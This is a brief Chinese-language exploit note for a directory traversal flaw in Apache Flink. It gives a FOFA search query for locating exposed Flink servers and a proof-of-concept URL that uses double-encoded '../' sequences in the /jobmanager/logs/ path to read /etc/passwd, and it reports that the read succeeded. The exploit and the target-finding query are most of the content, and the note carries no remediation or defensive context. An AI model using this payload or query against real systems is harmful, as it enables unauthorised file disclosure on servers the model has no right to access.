Apache Flink目录遍历漏洞

fofa语法搜索 app="Apache-Flink"

poc:
http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

 读取成功

原文地址:https://www.cnblogs.com/xiaobai141/p/14248261.html